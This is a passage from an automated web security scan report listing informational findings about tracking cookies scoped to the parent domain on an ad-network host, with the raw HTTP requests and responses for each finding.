rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXT/TAhJnU0cgpqwwScHEsq8jKcVWn8biBJeiwj3bt/Z7Jno4eTUvRzGf2u88Dt+Xr5SMrCaDesP2v1b0OTJJ0SaxGkI/wp7+XJEJqbjRJx9w5bfXe8nwj2VXUacosCwLh4HW1pafBXtBaZ69LF3vwwNiRMOzM2hOzmIl3bkaNEsVIwrzqhtzkLb98whI1TyAiX4VXsMfxBwvwOTN3uNPwEJsPabBxQwHPp5/46LiCCA90/UyINB+lOenc2oXZx7bfxHZuTwOyjdiRgJsP1sXbC6eUwGWzLguW6SsMTBCG1D23QVRFUKOWM85CnTNYMCNXq3or7XEg8u2vvx0Y2vYif8fLD6jUtG/lMREU8yW7iI0DLsTrIFCkrm1kpy6i0cLlXjjhFLBrIRmwDmmZptEteCZ5cFjIDpAR4ciZvCZzfuQ1VVG5sVtQXpfs93UPetTR+8CjuUaU8qI8jPKp1c+1oFzm2RW+nTi7lTLQCZ+axJebX8rUBsWyiOwvAlEla/ilc0yBK6+tzryJwZMa1HEpun+Puz+CpaUf+Y00G82XdBWMgeDBrpnrxVALpF12tvSNB3VoEg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSMLHT2uikdn5vw/ZUsicc4VPat72X0BRE3fm6MNJiHGaKzb2aFbVjI59eif+fODfjX2iW0xsqMOMfyrrcddIMSklF+GlzYMSmLreI5Zy/GeW6vDj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/opLuXBEJqalRFyzz++kuS0t8FA35bmxx0Va9Cw8fcNBWphT6vuj41246c95NOaRAsl5hE/ZCrN9ltl638OMRjh6IkR46+Bn0HQbdSGKwzcO04+CyXwJk4Hw4YSr349H0jhzHFve3eZs4bvQZgRVZoV6WmyP4pc8FRRloHN3+orJACrVeeEz550D1q6YfT09jcb17LPDX8fRNzIxBY9d58s8KWjBNmXwVXJJ7UHisDFf9Ey7Ms7Wr2plDqEMX6bjjECP++dzpXLEjq+VGlvjNs1C2NYn//UK1d0sLFeGRAwP30BeDDG9nGG8OAncZJxK/3iMf/qG1fOQh11zX5a4KeTBQK17RFxsTNh2j2fKLpXHqWExgWzJQhuIp3yPqX/iP0Fdb1X0mccqxQ1tIULcMXty6FxRR2tEUdD/lOGzmw1dAxjKLqWZViDH+nw9VjH2eHWq1baas761ofPzSk/CbXGLKG0KjU+ETCo0d1J28pAv0u; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 19:14:08 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 19:14:07 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.203. http://pix04.revsci.net/I10985/b3/0/3/1008211/8734315.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/8734315.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXrNTCDRfrnhu4IU3vheM/Ns0vAjloMpK61eCPNQGTGFQ+Pxc0KjW0Xlx9X5zeVCOktMritE+GyIPrHmh/wJI9G0tz6rWCDZsNyLhfOjYs28Ifi7ZK7k5SPLCKDg5LCkkMizjb8d5LjjS3L2gH8oCROKAdneR4EgIKBwgNnoUm8k/Iwbc5r4m8aYFMryjeoiMTlzQ7R2IFcY8Q30Ro53whtEoiH/Bu+WoyryZgtVlkCSLPEeefZrCBZbLrD+//8WqGERGMitWzex0mmzhlaVCaVmQgGOu46YSaKRUQ0m04HBV+KheQbSZlO5VtneOe+StGD9+RalRkrNLXKMMvqWaSv8TRCG1D23sVtFUKOWM85Cnas1iLS00ItR9yFTE/YWVXwG8UEUWK6CycJoz/7KbnOhrHto9JqDJvhMs6FmQ0ENl89++0guMuHAlbFtC4wwyRY4jihicDrrCYF+k7q0ssXibS5dierQ3j1ZXKxMZzp/L/jHd3g5EGlKNNxlOCT2gANBCaNF4nxnLcvPGiAYgi31Y7w7LAcd54UboJwOyvd/b2G8gW+FwhJ9O9HheorekzuAHP3E0sGIJNSzXCqG+Cczq3niWiSdKMMf7cYPXO77Hb8jwL0YYOxDUE0SwQ==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:34:42 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/8734315.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus__S9R="MLsXtSMNZzhvJZE469KkOkhRHfJm5qBSudNqQAMqTK+yvs0UNiAwl8R+cnLZYDAKPqjtizoHf5iqPiyCgqe7ihtvjUhuyRnAIWEfONQVaWQI3hZn8LoPmknRu9iml74e+daMgu1Q9rosQ0h9NsRzoYdTVgBuasKm3cgVkoTI4/6APRtJU/LEkDKZ79o1w4Qn6LjQnW1h/fOfQqSmendVjZaL5mEjznpWm0VTDbXlcX+6yNZUfxqjh0WiOVQApMgRq8XZJa/Zk+QwYqgOcnJSzpQs9x6wMfRxGzZjv70xp4AP77dHSM9QsNJ0m2R1zW4+u8YsEUZ42sgANxTy/WpaUdHjMyzaep/vP4+/QsiuV+QkTsIvEdoYgA9q5E6EVYm47ZwsnBgcY6O9o3hrvPc3rMejyiEmnP42oNSC2X+joMcYeJ+VD6rT07HAE3AAz6XIKxYN4Z9pL0CNDKZAhnTzUB2L0FP351hBoyfpfjkE3Rt/2xUV8S9Ejst/lQnU5sniqXujjXxaYr0L1vMv1Jsnap3dORXvfIOH00uSGHEV3vJLiDwpOZ0nGoaAPeE4e1pTWtpoPXrIDfChgaxwE5KOnM638b3lS26g8esXy3WIejLU1Q0hjjI019Se1ZkpmC6QOsRxAdZJUp8e8xKxigSNJAnpdBNGkLNalLAij36iA3JkFLM+HRyTgTV709uzG/Cq6Gd3Uadn0M99zWlueNxgamj2iA04HNbGLYjwxIWAMUSAJANOgy4sqbsbpInSIS87s8xYpDTGm2YFi9cLpfOLxE+NofReYBo7Kh2HGtbn7DzVoOsrPTCBq5oVFbJeiITAJlJ7FJO2/IYu2BvT5fly6tI6tNvBRqorxc3l13zmFonsKc5ND84ZShzyQrXyvT5GHr3AAsVwbcW4BjdPSPoU7RVP/Qleha3t6MJvrs4Znba1x4heFQ6ZOLLP6XoOIAGir7JK0feiKxnOverYJyonAsRqA5VPUe4Fax73gWEfKhVLtwzelDb1N3e3wzW0+86KXh67MgoQ0w5C38HuJbRE74Zwsua9KDq2628lPQjA7Ndbxr50nPcZS9CdLODEuwL8c6G6/af4CGX9wcfm3W9VDlgJKBECzIpxyQOTP5U4Ls03NIUrc3UO32LIQISMewM8/8A1o1DPCUWJ0UMmqTF5zaRQcixff4PN+q4I263ge7qWgqOaUhknot1/9PPWADJa+SfHTtEHQkgnPhkMhM6dKMBwpisq7uxr4mgZ7KjLG/12MYHHvHyDjNhi+B6Kj5twuiEVN13rw287zMvbwXihQsnofA46jxNz5GrwPu1sdjYs+EGgwnNbWoUFos8c9NdfyXxVJf34UhSOK7G030dzxZe2"; rsi_us_1000000="pUM14ymnMBYY7dXKYa7+iv3EgSSw/Y8tJ+gZNnYLLHa8d4Y1v0lUZEkxjU7NelY0QcHuDIduu0zKlUsklWARVd6+se6cClQA1kPsZF7mtFPWQthJGqP3aEP/Els3EHmRToETTZFmihDhiVKOCXLxkiM17TU7zj4ngiQ4oRnPnFK89XPRmRV4IWSdXROcDuxjITdkLEY03nS13tB3wtTOwQKZEgSeSALCIxbusJEfXL9zmpsCYE22t4xzi4o9NKvXRAGU8PiJjcr/rHOJeDVjh+8Nwr6ukBIEminfvq3P1X4TSXwz4MKEEm7SUVd6CUcoDnUzXeAi/Ct/TuruCiMtaygwY0AtigC9uSei/+HoKkWB4Aowhx48DKSIqsQsg0UYDjaqK95XiKBS91uetAb3fI46x9yMJ3r2oekBTZ6ASf282CVOAOSDpU+O3dhOmqH9DP7OlPyI6hpt0c0TJAQqAjrujJLgwJQXJvj7hyx+1LVSb2lSWpdEywJjaNUJlttpRPXn3mwwB7WUov7tBSZT5Yw49gtvbgeR6vS/pYWO3Y9XI1eHqlL3n1CDwg8xBRWak2/69bsCjbXTbMMSJtLN0v5gBVlBeR2DD9NWA2HbvPjsqQE0fB/otaogzQgzUuJT3yFecoAfGp55+Lz27OhYR8wcNR3ZBfruhhUyNJBCXvt70+WkSvjx8DPqFZ53R5JyA0JNpauWgOEmKjm++q8BXfAK7yRqNuQc9WJKdkL9Iv3EiV4hD0VpAW9b77VUQXHUdBQCPKorQuByi1kJICahjNh+sK7F9uFNParIk3qJosYR2M1h5gmiwt26uVxKxPCXzhSt8acviZE9e0CNbaWCwq9ajeNA/8EswRo0XRtcBY8juUWW6icPR3Taxs4hhNqKNuVaw2WfQc2FPpK6TTRYMbv/tjS2J9GxPBRtoBa2pmnjEg2cwL6Zih6GfB1WT2QdegbRFaICdC+l/vKzbHrKq0VGMBifZSmcJO4CPCjVY//F9DAa8+m3o+aWkBghphs/ED28I48cTB7FTcWJHXuvpbQs6qk0sGGCL2Qm2G7jocOOpBHUBUB2HhPc31J7OThksnfG6M3RiPtJLoOhujGBo6UPvjAr74jA4OKswU78Y6NYg7EcLi6OnwPK5vq16abTG9owpzKUW/j289fn6YrnC2vsPKnQAPD7xe5eP2s8DrgSglVqcCp3A5fzuvGlBpfGcdRpPWN/Gv12f7yeEbeEqDEvf0aEfDwvvv3YfI9jwzlZ62xFkzUQo4nv3UbQSNPkGxLhJRv1ODOO9zg0k2D2rMrE2MIJ3Hg2d6bLlTIPKSp0S4dDguJyhyDRVdHrRlb/M3tta/eeEvWkbBenr7VAjyZ1nQIdpr1DI+o6qRbF+EUF1OURAWwYp05qvjx6mOpnPqvGiWnq8D6hhpRlltZc9F5xNMb/zScMVOE1X7t+OQyz04xvfmym8i4Xs/pSES40AdX6Cz8CIKqCNyk2Wd6aDEkSMysZlkDU6hYDTXEbzIDa3EAjt6KPb2zfB8RpwPFUyz8KzuXDHtcugSUzgpVUIfBmEsulXzpd3MUBIzdKFO/JYKbH8+iXdxCTUAiIGJNa6V0St0H3cUCDTHfCT0+uziiUlQ6ErjTkbyhdRdkHO4B2eurhZOlKMF5eVUYV32R4xsMpnXQsL6A3bS9EG9mD4pA6lSdme9VhAelEZVjJjcGiy4Aq4sAfYP90TyQL5f3JeWl0UfCi9IO3ouNkdj75IzFryumqyw4Tlw+Y2FWyOVfSfodfY0FgRCVZ8VQhNZ1XwEoQvw=="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSMLHT2uikdn5vw/ZUsicc4VPat72X0BRE3fm6MNJiHGaKzb2aFbVjI59eif+fODfjX2iW0xsqMOMfyrrcddIMSklF+GlzYMSmLreI5Zy/GeW6vDj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/opLuXBEJqalRFyzz++kuS0t8FA35bmxx0Va9Cw8fcNBWphT6vuj41246c95NOaRAsl5hE/ZCrN9ltl638OMRjh6IkR46+Bn0HQbdSGKwzcO04+CyXwJk4Hw4YSr349H0jhzHFve3eZs4bvQZgRVZoV6WmyP4pc8FRRloHN3+orJACrVeeEz550D2W4KDVStKMyOgDjxWdMFxxHpg3AHBYkpBNMBoAG5id29UJGmVtNGwNVI9r9XZ0KolO8i27Ocxwz/7CbvNhtHsauJCEmJIdLrIneu/il6s6Ep87uZogRqCT0fV8J/KUyGraD4s8yNSRSLwetTyWv9vU/a3KUCbaDf0eo14mxtHD6ys9bCtSVdhlOBTwgAN5y2Z0HhaZiCWH1lEYY0VgZqZlnWRg//nPTWSgENvonNSnklsf4sRUU9GzTQOuC7rbMzB/GRVxQTJ0q09LstbGLvewxI1zMUdkCMEXV0Jklgsi/Kh8QBNwBv05

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXrNTCDRfrnhu4IU3vheM/Ns0vAjloMpK61eCPNQGTGFQ+Pxc0KjW0Xlx9X5zeVCOktMritE+GyIPrHmh/wJI9G0tz6rWCDZsNyLhfOjYs28Ifi7ZK7k5SPLCKDg5LCkkMizjb8d5LjjS3L2gH8oCROKAdneR4EgIKBwgNnoUm8k/Iwbc5r4m8aYFMryjeoiMTlzQ7R2IFcY8Q30Ro53whtEoiH/Bu+WoyryZgtVlkCSLPEeefZrCBZbLrD+//8WqGERGMitWzex0mmzhlaVCaVmQgGOu46YSaKRUQ0m04HBV+KheQbSZlO5VtneOe+StGD9+RalRkrNLXKMMvqWaSv8TRCG1D23sVtFUKOWM85Cnas1iLS00ItR9yFTE/YWVXwG8UEUWK6CycJoz/7KbnOhrHto9JqDJvhMs6FmQ0ENl89++0guMuHAlbFtC4wwyRY4jihicDrrCYF+k7q0ssXibS5dierQ3j1ZXKxMZzp/L/jHd3g5EGlKNNxlOCT2gANBCaNF4nxnLcvPGiAYgi31Y7w7LAcd54UboJwOyvd/b2G8gW+FwhJ9O9HheorekzuAHP3E0sGIJNSzXCqG+Cczq3niWiSdKMMf7cYPXO77Hb8jwL0YYOxDUE0SwQ==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:34:42 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 14:34:42 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.204. http://pix04.revsci.net/I10985/b3/0/3/1008211/896562366.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/896562366.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rsB4rOfq5QuYXLnKYyViGymJW18v6pxo9TQQ/CMgK6G8jF0H/wC6LifrWDbWiI6t+ib4fuctjH0iWzAw3r14JwP/YYUQ4WilEZa1mDBgWbOLLoFbDs08LFTYab0cAaYOpnwIMBLA0IVDPklGA4cG8987irB0kMgiihI/CdBBO2IqsXUHg2YYHfbCkyKF/JXks5u+heEvi341VI6cB5NWitPCMF79O9TY2r/1wMDRcxar0dCcOUA19iyGVNLDYDF86x87PdcgYejEsUMdc2duPgOIx4rC7FyfGZpR7epenDDvIYvU27qvwht6FQASYws3bEqTCb6mh0vFu5mv8ReFLS8QXn+IWxW7m5aAgGHm2bnArmy/4uwEVzAZjnz24jkctfnC4A0VAac2LfKNp8W5jT8vmBdwMvqFHxSlTsD0Kux9KykoJaPynhziwgDG6HPOPmv1RQG6jr4x5rAcBTMD+mTBWcemEZbFGGLDECy+LTFTwX48tMHCQtqJHmvfXKSJqSmaZfSJNT0KjhPHsowPx4UlxsgpWDUNgaFA4bycN5/BS3Q9yH+j7P99D2ro1KG/8HAzxoqTZa9cIyBFViRuBpETRngEAkIHFvjISsC/NlRFmF89GpPKG9QLdIB4xAvr2lY7fC7DH/GHCA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 11:28:25 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/896562366.js?D=DM_LOC%3Dhttp%253A%252F%252Fsearch.cnbc.com%252Fmain.do%253Ftarget%253Dall%2526keywords%253Dxss%2526categories%253Dexclude%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43418837%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; 